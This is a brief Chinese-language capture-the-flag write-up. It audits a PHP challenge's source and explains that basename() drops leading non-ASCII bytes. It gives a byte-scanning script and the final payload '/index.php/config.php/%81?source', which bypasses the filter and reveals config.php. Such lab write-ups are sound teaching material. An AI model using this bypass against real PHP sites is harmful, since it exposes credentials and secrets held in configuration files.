有源码直接看源码了
<?php
include 'config.php';
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");
}
if (isset($_GET['source'])) {
highlight_file(basename($_SERVER['PHP_SELF']));
exit();
}
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
$guess = (string) $_POST['guess'];
if (hash_equals($secret, $guess)) {
$message = 'Congratulations! The flag is: ' . FLAG;
} else {
$message = 'Wrong.';
}
}
?>
源码审计
有关于$_SERVER[‘PHP_SELF’]。
(preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF']))
不能以config.php结尾 secret反正猜不着,
那么就要好好利用basename($_SERVER[‘PHP_SELF’])了 basename() 函数会返回路径中的文件名部分 假如路径是/index.php/config.php basename后会返回config.php,就算后面跟上多余的字符也会返回文件名部分
在官方的英文描述中
With the default locale setting “C”, basename() drops non-ASCII-chars
at the beginning of a filename.
basename()函数会去掉文件名开头的非ASCII值 ASCII值范围为0-255,但ASCII码并没有规定编号为128~255的字符(大于%ff的会报错400 Bad Request) ASCII表范围为0-127,也就是我们传入128(%80)以上的数值,即可绕过正则 除此以为根据题目提示我们读取flag还需要用到?source 跑一跑
<?php
for ($i=80; $i < 255; $i++) {
$filename='config.php/'.chr($i);
if (!preg_match('/config\.php\/*$/i', $filename)){
if(basename($filename)=='config.php'){
echo dechex($i).' ';
}
}
}
%5c是反斜杠,会报错剩下的80-ff随便带一个就行 Payload: /index.php/config.php/%81?source
|